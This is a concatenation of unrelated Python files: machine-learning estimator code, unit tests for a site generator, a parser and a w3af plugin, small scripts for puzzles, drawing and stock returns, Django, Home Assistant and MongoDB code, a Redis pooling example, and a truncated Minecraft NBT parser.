gpu-captiable optimizer *****") tvars = pretrained_tvars model_io_fn.print_params(tvars, string=", trainable params") update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): train_op = optimizer_fn.get_train_op(loss, tvars, opt_config.init_lr, opt_config.num_train_steps, use_tpu=use_tpu) train_metric_dict = train_metric(features['input_ori_ids'], model.get_sequence_output_logits(), seq_features, **kargs) if not kargs.get('use_tpu', False): for key in train_metric_dict: tf.summary.scalar(key, train_metric_dict[key]) tf.summary.scalar('learning_rate', optimizer_fn.learning_rate) tf.logging.info("***** logging metric *****") tf.summary.scalar("causal_attenion_mask_length", tf.reduce_sum(model.attention_mask)) tf.summary.scalar("bi_attenion_mask_length", tf.reduce_sum(model.bi_attention_mask)) if kargs.get('use_tpu', False): estimator_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=loss, train_op=train_op, scaffold_fn=scaffold_fn) else: estimator_spec = tf.estimator.EstimatorSpec( mode=mode, loss=loss, train_op=train_op) return estimator_spec elif mode == tf.estimator.ModeKeys.EVAL: if kargs.get('mask_type', 'left2right') == 'left2right': tf.logging.info("***** using left2right mask and loss *****") sequence_mask = tf.to_float(tf.not_equal(features['input_ori_ids'][:, 1:], kargs.get('[PAD]', 0))) elif kargs.get('mask_type', 'left2right') == 'seq2seq': tf.logging.info("***** using seq2seq mask and loss *****") sequence_mask = tf.to_float(features['segment_ids'][:, 1:]) if not kargs.get('use_tpu', 
False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) gpu_eval_metrics = eval_metric(features['input_ori_ids'], model.get_sequence_output_logits(), sequence_mask, mask_type=kargs.get('mask_type', 'left2right')) else: tpu_eval_metrics = (eval_metric, [ features['input_ori_ids'], model.get_sequence_output_logits(), sequence_mask ]) print("===tpu metric==", tpu_eval_metrics, "==tpu metric++") if kargs.get('use_tpu', False): estimator_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=loss, eval_metrics=tpu_eval_metrics, scaffold_fn=scaffold_fn) else: estimator_spec = tf.estimator.EstimatorSpec(mode=mode, loss=loss, eval_metric_ops=gpu_eval_metrics) return estimator_spec elif mode == tf.estimator.ModeKeys.PREDICT: if kargs.get('predict_type', 'sample_sequence') == 'sample_sequence': results = bert_seq_sample_utils.sample_sequence(model_api, model_config, mode, features, target="", start_token=kargs.get("start_token_id", 101), batch_size=None, context=features.get("context", None), temperature=kargs.get("sample_temp", 1.0), n_samples=kargs.get("n_samples", 1), top_k=0, end_token=kargs.get("end_token_id", 102), greedy_or_sample="greedy", gumbel_temp=0.01, estimator="stop_gradient", back_prop=True, swap_memory=True, seq_type=kargs.get("seq_type", "seq2seq"), mask_type=kargs.get("mask_type", "seq2seq"), attention_type=kargs.get('attention_type', 'normal_attention') ) # stop_gradient output: # samples, mask_sequence, presents, logits, final sampled_token = results['samples'] sampled_token_logits = results['logits'] mask_sequence = results['mask_sequence'] estimator_spec = tf.estimator.EstimatorSpec( mode=mode, predictions={ 'token':sampled_token, "logits":sampled_token_logits, "mask_sequence":mask_sequence }, export_outputs={ "output":tf.estimator.export.PredictOutput( { 'token':sampled_token, "logits":sampled_token_logits, "mask_sequence":mask_sequence } ) } ) return estimator_spec elif kargs.get('predict_type', 'sample_sequence') == 'infer_inputs': sequence_mask = tf.to_float(tf.not_equal(features['input_ids'][:, 1:], kargs.get('[PAD]', 0))) if kargs.get('mask_type', 'left2right') == 'left2right': tf.logging.info("***** using left2right mask and loss *****") sequence_mask = tf.to_float(tf.not_equal(features['input_ori_ids'][:, 1:], kargs.get('[PAD]', 0))) elif kargs.get('mask_type', 'left2right') == 'seq2seq': tf.logging.info("***** using seq2seq mask and loss *****") sequence_mask = tf.to_float(features['segment_ids'][:, 1:]) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) output_logits = model.get_sequence_output_logits()[:, :-1] # output_logits = tf.nn.log_softmax(output_logits, axis=-1) output_id_logits = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=features['input_ids'][:, 1:], logits=output_logits) per_example_perplexity = tf.reduce_sum(output_id_logits * sequence_mask, axis=-1) # batch per_example_perplexity /= tf.reduce_sum(sequence_mask, axis=-1) # batch perplexity = tf.exp(per_example_perplexity) estimator_spec = tf.estimator.EstimatorSpec( mode=mode, predictions={ 'token':features['input_ids'][:, 1:], "logits":output_id_logits, 'perplexity':perplexity, "all_logits":output_logits }, export_outputs={ "output":tf.estimator.export.PredictOutput( { 'token':features['input_ids'][:,1:], "logits":output_id_logits, 'perplexity':perplexity, "all_logits":output_logits } ) } ) return estimator_spec else: raise 
NotImplementedError() return model_fn
python
# -*- coding: utf-8 -*- '''test cases for config_loader module''' import unittest import os import shutil import cray.craylib.config_loader as config_loader from cray.craylib.generate_manager import GenerateManager ROOT_DIR = os.path.join(os.path.dirname(__file__), "test_site") SITE_DIR = os.path.join(os.path.dirname(__file__), "_site") def get_test_suites(): '''Return test cases as a suite in this module''' suite = unittest.TestSuite() suite.addTest(SiteGenerationTestCase()) return suite class SiteGenerationTestCase(unittest.TestCase): '''Test case for post generation''' def runTest(self): '''Run test''' if os.path.exists(SITE_DIR): shutil.rmtree(SITE_DIR, ignore_errors=True) conf_loader = config_loader.ConfigLoader(ROOT_DIR) self.assertTrue(conf_loader.parse_config()) generate_manager = GenerateManager(ROOT_DIR) generate_manager.read_config(conf_loader) generate_manager.generate_site() self.assertTrue(os.path.exists(SITE_DIR)) index_path = os.path.join(SITE_DIR, 'index.html') about_path = os.path.join(SITE_DIR, 'about', 'index.html') hello_post_path = os.path.join(SITE_DIR, 'post', '2017', '6', '2', 'hello-world', \ 'index.html') rss_path = os.path.join(SITE_DIR, 'feed.xml') self.assertTrue(os.path.exists(index_path)) self.assertTrue(os.path.exists(about_path)) self.assertTrue(os.path.exists(hello_post_path)) self.assertTrue(os.path.exists(rss_path)) index_content = r'''<html> <head> <meta charset="utf-8"> <title>Index</title> </head> <body> <header class="site-header"> <div class="wrapper"> <a class="site-title" href="/">Index</a> <nav class="site-nav"> <!-- <a href="#" class="menu-icon"> <svg viewBox="0 0 18 15"> <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"/> <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"/> <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"/> </svg> </a> --> <div class="trigger"> <a class="page-link" href="/about/">about</a> </div> </nav> </div> </header> <h1>Post list:</h1> <ul id="navigation"> <li><a href="post/2017/6/2/hello-world">Welcome to Cray!</a></li> </ul> <footer> <h3>Powered by Bolun 2013 - 2017</h3> </footer> </body> </html>''' about_content = r'''<html> <head> <meta charset="utf-8"> <title>about</title> </head> <body> <header class="site-header"> <div class="wrapper"> <a class="site-title" href="/">Index</a> <nav class="site-nav"> <!-- <a href="#" class="menu-icon"> <svg viewBox="0 0 18 15"> <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"/> <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"/> <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"/> </svg> </a> --> <div class="trigger"> <a class="page-link" href="/about/">about</a> </div> </nav> </div> </header> <h1>about</h1> <div><p>This is the first test page for test_site</p></div> <footer> <h3>Powered by Bolun 2013 - 2017</h3> </footer> 
</body> </html>''' hello_content = r'''<html> <head> <meta charset="utf-8"> <title>Welcome to Cray!</title> </head> <body> <header class="site-header"> <div class="wrapper"> <a class="site-title" href="/">Index</a> <nav class="site-nav"> <!-- <a href="#" class="menu-icon"> <svg viewBox="0 0 18 15"> <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"/> <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"/> <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"/> </svg> </a> --> <div class="trigger"> <a class="page-link" href="/about/">about</a> </div> </nav> </div> </header> <h1>Welcome to Cray!</h1> <p>2017-06-02 22:22:22</p> <div><p>hello world!</p></div> <footer> <h3>Powered by Bolun 2013 - 2017</h3> </footer> </body> </html>''' rss_title_regex = '<title>Demo</title>' rss_description_regex = '<description>demo site description</description>' rss_item_title_regex = '<title>Welcome to Cray!</title>' rss_item_description_regex = r'<description>\s+hello world!</description>' rss_item_link_regex = r'<link>http://www.demo.com/post/2017/6/2/hello-world</link>' rss_item_guid_regex = r'<guid isPermaLink=\"false\">5876f9d8-bd18-3935-9d2f-5dc36c00ae5f</guid>' rss_item_pubdate_regex = r'<pubDate>2017-06-02 22:22:22</pubDate>\s+</item>' self.maxDiff = None with open(index_path) as index_fd: self.assertEqual(index_content, index_fd.read()) with open(about_path) as about_fd: self.assertEqual(about_content, about_fd.read()) with open(hello_post_path) as hello_fd: self.assertEqual(hello_content, hello_fd.read()) with open(rss_path) as rss_fd: cotent = rss_fd.read() self.assertRegex(cotent, rss_title_regex) self.assertRegex(cotent, rss_description_regex) self.assertRegex(cotent, rss_item_title_regex) self.assertRegex(cotent, rss_item_description_regex) self.assertRegex(cotent, rss_item_link_regex) self.assertRegex(cotent, rss_item_guid_regex) self.assertRegex(cotent, rss_item_pubdate_regex) if os.path.exists(SITE_DIR): shutil.rmtree(SITE_DIR, ignore_errors=True)
python
#!/usr/bin/env python3

import sys
import time
import math


def go(l, n, partials):
    return (partials[-1] - partials[n]) % 10


def fft(l):
    """Fucked Fourier Transform"""
    partials = [0]
    sum = 0
    for v in l:
        sum += v
        partials.append(sum)

    x = []
    for i, y in enumerate(l):
        x.append(go(l, i, partials))
    return x


def main(args):
    orig_data = [int(x) for x in [s.strip() for s in sys.stdin][0]]
    data = orig_data * 10000
    offset = int(''.join(str(x) for x in data[:7]))
    assert offset * 2 > len(data)
    data = data[offset:]
    for i in range(100):
        data = fft(data)
    print(''.join(str(x) for x in data[:8]))


if __name__ == '__main__':
    main(sys.argv)
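

# A sketch of why the prefix-sum shortcut above works (not part of the original
# solution): for positions past the halfway point of the signal, the repeating
# 0/1/0/-1 pattern degenerates to all 1s from that position onward, so each
# output digit is simply the suffix sum mod 10 -- which is exactly what
# go()/fft() compute. An optional check on a toy input:
def _check_fft_shortcut():
    """Sanity check: fft() matches a naive suffix-sum phase on a toy input."""
    toy = [1, 2, 3, 4]
    naive = [sum(toy[i:]) % 10 for i in range(len(toy))]
    assert fft(toy) == naive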
python
import enolib def test_querying_an_existing_single_line_required_string_comment_from_a_section_produces_the_expected_result(): input = ("> comment\n" "# section") output = enolib.parse(input).section('section').required_string_comment() expected = ("comment") assert output == expected def test_querying_an_existing_two_line_required_string_comment_from_a_section_produces_the_expected_result(): input = (">comment\n" "> comment\n" "# section") output = enolib.parse(input).section('section').required_string_comment() expected = ("comment\n" " comment") assert output == expected def test_querying_an_existing_required_string_comment_with_blank_lines_from_a_section_produces_the_expected_result(): input = (">\n" "> comment\n" ">\n" "> comment\n" ">\n" "> comment\n" ">\n" "# section") output = enolib.parse(input).section('section').required_string_comment() expected = (" comment\n" "\n" " comment\n" "\n" "comment") assert output == expected def test_querying_an_optional_existing_string_comment_from_a_section_produces_the_expected_result(): input = ("> comment\n" "# section") output = enolib.parse(input).section('section').optional_string_comment() expected = ("comment") assert output == expected def test_querying_an_optional_missing_string_comment_from_a_section_produces_the_expected_result(): input = ("# section") output = enolib.parse(input).section('section').optional_string_comment() assert output == None
python
""" test_finger_pks.py Copyright 2012 Andres Riancho This file is part of w3af, http://w3af.org/ . w3af is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. w3af is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with w3af; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ from nose.plugins.attrib import attr from w3af.plugins.tests.helper import PluginTest, PluginConfig class TestFingerPKS(PluginTest): base_url = 'http://www.bonsai-sec.com/' _run_configs = { 'cfg': { 'target': base_url, 'plugins': {'infrastructure': (PluginConfig('finger_pks'),)} } } @attr('ci_fails') def test_find_pks_email(self): cfg = self._run_configs['cfg'] self._scan(cfg['target'], cfg['plugins']) emails = self.kb.get('emails', 'emails') self.assertEqual(len(emails), 2, emails)
python
import numpy as np
import cv2

# 'uint8' assigns an 8bit unsigned integer to the colour values in the array
# Create a blank 512px x 512px canvas with 3 colour channels
pic = np.zeros((512, 512, 3), dtype='uint8')

# Magenta colour, not color
colour = (255, 0, 255)

# Circles overview: https://www.khanacademy.org/math/basic-geo/basic-geo-area-and-perimeter/area-circumference-circle/a/radius-diameter-circumference
# Radius is "from the centre to any point on the circle itself"
# Diameter is "from any point on the circle through the centre itself all the way to the other side (which is 2x the radius!)"
# Circumference is "the distance of circle itself all the way around (diameter * 3.14159 or C/d = π)"

# Draws an unaliased circle with a radius of 128px (i.e. a diameter of 256px)
cv2.circle(pic, (256, 256), 128, colour)

# Learn more: https://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html
# Antialiasing should be straightforward: https://stackoverflow.com/questions/11055837/drawing-a-line-in-opencv-with-cv-aa-flags-is-not-producing-an-anti-aliased-line#25420463

cv2.imshow('Circle', pic)
cv2.waitKey(0)
cv2.destroyAllWindows()
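
# A small follow-up sketch (not in the original file): the LINE_AA line type
# mentioned in the link above draws the same circle antialiased; a thickness
# of -1 would fill it instead of stroking the outline.
cv2.circle(pic, (256, 256), 128, colour, thickness=1, lineType=cv2.LINE_AA)
cv2.imshow('Antialiased circle', pic)
cv2.waitKey(0)
cv2.destroyAllWindows()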
python
#! /usr/bin/env python
# _*_ coding:utf-8 _*_


class Solution(object):
    def generateParenthesis(self, n):
        if n <= 0:
            return []
        if n == 1:
            return ['()']
        res = self.generateParenthesis(n - 1)
        ret = set()
        for v in res:
            for i in range(len(v)):
                ret.add(v[0: i] + '()' + v[i:])
        return list(ret)


if __name__ == '__main__':
    so = Solution()
    # assert (so.generateParenthesis(0) == [])
    # assert (so.generateParenthesis(1) == ['()'])
    # print so.generateParenthesis(2)
    a = so.generateParenthesis(3)
    print 'n:3 sum:', len(a)
    a = so.generateParenthesis(4)
    print 'n:4 sum:', len(a)
    a = so.generateParenthesis(5)
    print 'n:5 sum:', len(a)
    a = so.generateParenthesis(6)
    print 'n:6 sum:', len(a)
python
from django_codemod.constants import DJANGO_1_9, DJANGO_3_1
from django_codemod.visitors.base import BaseRenameTransformer


class PrettyNameTransformer(BaseRenameTransformer):
    """Replace `django.forms.forms.pretty_name` compatibility import."""

    deprecated_in = DJANGO_1_9
    removed_in = DJANGO_3_1
    rename_from = "django.forms.forms.pretty_name"
    rename_to = "django.forms.utils.pretty_name"


class BoundFieldTransformer(BaseRenameTransformer):
    """Replace `django.forms.forms.BoundField` compatibility import."""

    deprecated_in = DJANGO_1_9
    removed_in = DJANGO_3_1
    rename_from = "django.forms.forms.BoundField"
    rename_to = "django.forms.boundfield.BoundField"
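

# Illustrative sketch only: the same declarative pattern covers any other moved
# import by subclassing BaseRenameTransformer. The class name and dotted paths
# below are hypothetical and not part of django_codemod.
class ExampleRenameTransformer(BaseRenameTransformer):
    """Replace a hypothetical `django.forms.forms.example_helper` import."""

    deprecated_in = DJANGO_1_9
    removed_in = DJANGO_3_1
    rename_from = "django.forms.forms.example_helper"
    rename_to = "django.forms.utils.example_helper"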
python
from yahoo import Quote, YahooQuote stocks = ['AA', 'AXP', 'BA', 'BAC', 'CAT', 'CSCO', 'CVX', 'DD', 'DIS', 'GE', 'HD', 'HPQ', 'IBM', 'INTC', 'JNJ'] stocks += ['JPM', 'KO', 'MCD', 'MMM', 'MRK', 'MSFT', 'PFE', 'PG', 'T', 'TRV', 'UNH', 'UTX', 'VZ', 'WMT', 'XOM'] price = {} quotes = {} returns = {} for s in stocks: print 'Stock', s for year in range(1993, 2015): try: quotes[year, s] = YahooQuote(s,'%s-01-01'%(str(year)), '%s-01-08'%(str(year))) except ValueError: pass for q in str(quotes[year, s]).split('\n'): if q.split(',')[0] == s: price[year, s] = float(q.split(',')[5]) break for s in stocks: for year in range(1994, 2015): returns[year, s] = (price[year, s]-price[year -1, s])/price[year -1, s] f = open('DJIA.dat', 'w') f.write('set assets := ') for s in stocks: f.write(s+' ') f.write(';\n') f.write('param R :') for s in stocks: f.write(s+' ') f.write(':=\n') for year in range(1994, 2015): f.write(str(year)+' ') for s in stocks: f.write('%.3f '%(returns[year, s])) f.write('\n') f.write(';\n') f.close() print 'param R :', for s in stocks: print s, print ':=' for year in range(1994, 2015): print year, for s in stocks: print '%.3f'%(returns[year, s]), print
python
"""Support for control of ElkM1 outputs (relays).""" from homeassistant.components.switch import SwitchEntity from . import ElkAttachedEntity, create_elk_entities from .const import DOMAIN async def async_setup_entry(hass, config_entry, async_add_entities): """Create the Elk-M1 switch platform.""" elk_data = hass.data[DOMAIN][config_entry.entry_id] entities = [] elk = elk_data["elk"] create_elk_entities(elk_data, elk.outputs, "output", ElkOutput, entities) async_add_entities(entities, True) class ElkOutput(ElkAttachedEntity, SwitchEntity): """Elk output as switch.""" @property def is_on(self) -> bool: """Get the current output status.""" return self._element.output_on async def async_turn_on(self, **kwargs): """Turn on the output.""" self._element.turn_on(0) async def async_turn_off(self, **kwargs): """Turn off the output.""" self._element.turn_off()
python
import pymongo

import config
from . import connection, db


def create_indexes():
    """
    Create mongodb indexes.
    """
    # VCF collection indexes
    db.vcfs.drop_indexes()
    db.vcfs.create_index("name")
    db.vcfs.create_index("samples")
    db.vcfs.create_index(
        [
            ("filename", pymongo.ASCENDING),
            ("fileformat", pymongo.ASCENDING),
            ("filedate", pymongo.ASCENDING)
        ],
        sparse=True
    )
    db.vcfs.create_index("INFO")
    db.vcfs.create_index("FORMAT")
    db.vcfs.create_index("FILTER")

    # Variant collection indexes
    db.variants.drop_indexes()
    db.variants.create_index("samples.sample")
    db.variants.create_index(
        [("samples.sample", pymongo.ASCENDING), ("samples.filter", pymongo.ASCENDING)],
        sparse=True
    )
    db.variants.create_index("samples.vcf_id")

    # Filter indexes
    db.variants.create_index(
        [
            ("chr", pymongo.ASCENDING),
            ("samples.info.POS_RANGE", pymongo.ASCENDING),
            ("orientation", pymongo.ASCENDING),
            ("chr2", pymongo.ASCENDING),
            ("remoteOrientation", pymongo.ASCENDING),
            ("samples.sample", pymongo.ASCENDING)
        ],
        sparse=True
    )


def resetdb():
    """
    Drop database and recreate indexes.
    """
    connection.drop_database(config.MONGODB_NAME)
    create_indexes()
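

# A hedged usage sketch (not part of the original module): a find() touching
# the same fields as the compound "filter" index above. The field values are
# placeholders chosen for illustration only.
def example_filter_query(sample_name):
    return db.variants.find({
        "chr": "1",
        "samples.info.POS_RANGE": {"$gte": 1000, "$lte": 2000},
        "orientation": True,
        "chr2": "1",
        "remoteOrientation": False,
        "samples.sample": sample_name,
    })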
python
#
# Copyright (C) 2018 SecurityCentral Contributors see LICENSE for license
#
"""
This base platform module exports platform related tasks.
"""
from securitycentralplatform.os_detection import platform_detection


class SecurityCentralPlatformTasks(platform_detection("tasks")):
    pass


tasks = SecurityCentralPlatformTasks()
python
from django import forms from apps.link.models import Link, Advertise from apps.post.models import Category, Post class CategoryAddForm(forms.ModelForm): class Meta: model = Category fields = "__all__" class CategoryEditForm(forms.ModelForm): pk = forms.CharField(max_length=100) class Meta: model = Category fields = "__all__" class PostAddForm(forms.ModelForm): class Meta: model = Post exclude = ('read_num',) class PostEditForm(forms.ModelForm): pk = forms.CharField(max_length=100) class Meta: model = Post exclude = ('read_num',) class LinkAddForm(forms.ModelForm): class Meta: model = Link fields = "__all__" class LinkEditForm(forms.ModelForm): pk = forms.CharField(max_length=100) class Meta: model = Link fields = "__all__" class AdvertiseAddForm(forms.ModelForm): class Meta: model = Advertise fields = "__all__" class AdvertiseEditForm(forms.ModelForm): pk = forms.CharField(max_length=100) class Meta: model = Advertise fields = "__all__" class UserAddForm(forms.Form): username = forms.CharField() email = forms.EmailField() password = forms.CharField(max_length=20, min_length=6) class UserEditForm(forms.Form): pk = forms.CharField() username = forms.CharField() email = forms.EmailField() password = forms.CharField(max_length=20, min_length=6)
python
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-08-18 23:25
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('climate_data', '0006_auto_20160816_1429'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='stationsensorlink',
            options={'ordering': ('station_order',)},
        ),
        migrations.AddField(
            model_name='stationsensorlink',
            name='read_frequency',
            field=models.PositiveSmallIntegerField(default=4),
        ),
    ]
python
import doctest
import unittest

import zeit.cms.testing


def test_suite():
    suite = unittest.TestSuite()
    suite.addTest(doctest.DocFileSuite(
        'content.txt',
        package='zeit.cms'
    ))
    suite.addTest(zeit.cms.testing.FunctionalDocFileSuite(
        'cleanup.txt',
        'cmscontent.txt',
        package='zeit.cms'
    ))
    return suite
python
# https://stackoverflow.com/questions/31663288/how-do-i-properly-use-connection-pools-in-redis

# settings.py:
import os  # needed for the getpid() call in init() below
import redis


def get_redis_connection():
    return redis.StrictRedis(host='localhost', port=6379, db=0)


# task1.py
import settings

connection = settings.get_redis_connection()


def do_something1():
    return connection.hgetall(...)


# task2.py
import settings

connection = settings.get_redis_connection()


def do_something1():
    return connection.hgetall(...)


# Question: each task file has its own redis instance (which presumably is very
# expensive). What's the best way of optimizing this? Is it possible to use
# connection pools for this example?
#
# Answer: redis-py provides a connection pool from which you can retrieve
# connections. Connection pools create a set of connections which you can use as
# needed (and when done, the connection is returned to the pool for further
# reuse). Trying to create connections on the fly without discarding them (i.e.
# not using a pool, or not using the pool correctly) will leave you with way too
# many connections to redis (until you hit the connection limit).
#
# You could choose to set up the connection pool in the init method and make the
# pool global (you can look at other options if uncomfortable with global).

redis_pool = None


def init():
    global redis_pool
    print("PID %d: initializing redis pool..." % os.getpid())
    redis_pool = redis.ConnectionPool(host='10.0.0.1', port=6379, db=0)


# You can then retrieve a connection from the pool like this:
redis_conn = redis.Redis(connection_pool=redis_pool)

# Also, using hiredis along with redis-py should improve performance in certain
# cases. Have you checked the number of connections open to the redis server
# with your existing setup? It most likely is quite high. You can use the INFO
# command to get that information:
#
#   redis-cli info
#
# Check for the Clients section, where the "connected_clients" field tells you
# how many connections you have open to the redis server at that instant.
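
# A small hedged sketch (not in the original answer): the same check can be done
# from redis-py itself instead of redis-cli, by calling INFO on a pooled client.
def count_connected_clients(pool):
    client = redis.Redis(connection_pool=pool)
    return client.info('clients')['connected_clients']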
python
import base64 import gzip import io import json import re import struct from pathlib import Path from typing import Any, BinaryIO, Dict, List, Optional, Tuple, Union from backend import constants _here = Path(__file__).parent with open(_here/'exceptions/enchants.json') as f: ENCHANT_EXCEPTIONS = json.load(f) with open(_here/'exceptions/reforges.json') as f: REFORGE_EXCEPTIONS = json.load(f) def _pop_byte(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(1), byteorder='big', signed=True) def _pop_ushort(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(2), byteorder='big', signed=False) def _pop_short(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(2), byteorder='big', signed=True) def _pop_int(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(4), byteorder='big', signed=True) def _pop_long(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(8), byteorder='big', signed=True) def _pop_string(bytes_f: BinaryIO) -> str: payload = _pop_ushort(bytes_f) return bytes_f.read(payload).decode('utf-8') class NbtTag: """ Class defining an NbtTag: a value with an intrinsic name. """ name: str value: Any def __init__(self, name: str, value: Any): """ Construct an NbtTag instance. :param name: The name of the NbtTag. :param value: The value of the NbtTag. """ self.name = name self.value = value def __getitem__(self, key: Union[str, int]): """ Call __getitem__ on the NbtTag's value instance variable. :param key: The desired key. :return: The value of the key in the value instance variable. """ return self.value[key] def parse_byte(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_byte(bytes_f)) def parse_short(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_short(bytes_f)) def parse_int(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_int(bytes_f)) def parse_long(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_long(bytes_f)) def parse_float(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, struct.unpack('>f', bytes_f.read(4))) def parse_double(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, struct.unpack('>d', bytes_f.read(8))) def parse_byte_array(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' payload = _pop_int(bytes_f) arr = [_pop_byte(bytes_f) for _ in range(payload)] return NbtTag(name, arr) def parse_string(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_string(bytes_f)) def parse_list(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' content_type = _pop_byte(bytes_f) payload = _pop_int(bytes_f) ret = [] for _ in range(payload): ret.append(PARSERS[content_type](bytes_f, read_name=False)) return NbtTag(name, ret) def parse_compound(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' tag_type = _pop_byte(bytes_f) ret = {} while tag_type != 0: tag = PARSERS[tag_type](bytes_f) ret[tag.name] = tag.value tag_type = _pop_byte(bytes_f) return NbtTag(name, 
ret) def parse_int_array(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' payload = _pop_int(bytes_f) arr = [_pop_int(bytes_f) for _ in range(payload)] return NbtTag(name, arr) def parse_long_array(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' payload = _pop_int(bytes_f) arr = [_pop_long(bytes_f) for _ in range(payload)] return NbtTag(name, arr) PARSERS = [ None, parse_byte, parse_short, parse_int, parse_long, parse_float, parse_double, parse_byte_array, parse_string, parse_list, parse_compound, parse_int_array, parse_long_array ] def _without_nbt_style(s: str) -> str: """ Given a full string with NBT styling, return the string without coloring and recomb symbols. :param s: The given string. :return: The given string without NBT styling. """ return re.sub('§ka|§.', '', s).strip() def deserialize(b64: str) -> NbtTag: """ Decode the gzipped base-64 encoding of an item's metadata. :param b64: The gzipped base-64 item metadata. :return: A NbtTag with the decoded metadata. """ bytes_gz = base64.b64decode(b64) bytes_f = io.BytesIO(gzip.decompress(bytes_gz)) # Pop the outer compound tag indicator _pop_byte(bytes_f) return parse_compound(bytes_f) def _get_extra_attrs(nbt: NbtTag) -> Dict[str, Any]: """ Helper method to get the 'ExtraAttributes' tag compound from an item NbtTag. Useful for other extraction methods. :param nbt: The NbtTag to be read. :return: The 'ExtraAttributes' tag compound. """ return nbt['i'][0]['tag']['ExtraAttributes'] def _get_pet_attrs(nbt: NbtTag) -> Dict[str, Any]: """ Helper method to get the 'petInfo' tag and parse it into a dictionary. Returns an empty dictionary if no pet attributes are found. :param nbt: The NbtTag to be read. :return: Dictionary containing the pet attributes of the item. """ extra_attrs = _get_extra_attrs(nbt) as_str = extra_attrs.get('petInfo', '{}') return json.loads(as_str) def extract_api_id(nbt: NbtTag) -> str: """ Get the API ID of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The ID of the item, directly as it appears in the Skyblock API. """ extra_attrs = _get_extra_attrs(nbt) return extra_attrs['id'] def extract_generic_base_name(nbt: NbtTag) -> str: """ Given the NbtTag corresponding to an item, return its generic base name. This corresponds to removing special symbols and reforges from the raw display name. Often, dropping the first word is enough to remove the reforge, but some exceptions apply and are specified in REFORGE_EXCEPTIONS. :param nbt: The NbtTag to be read. :return: The name of the item with extra symbols removed and reforge dropped, if applicable. """ name = 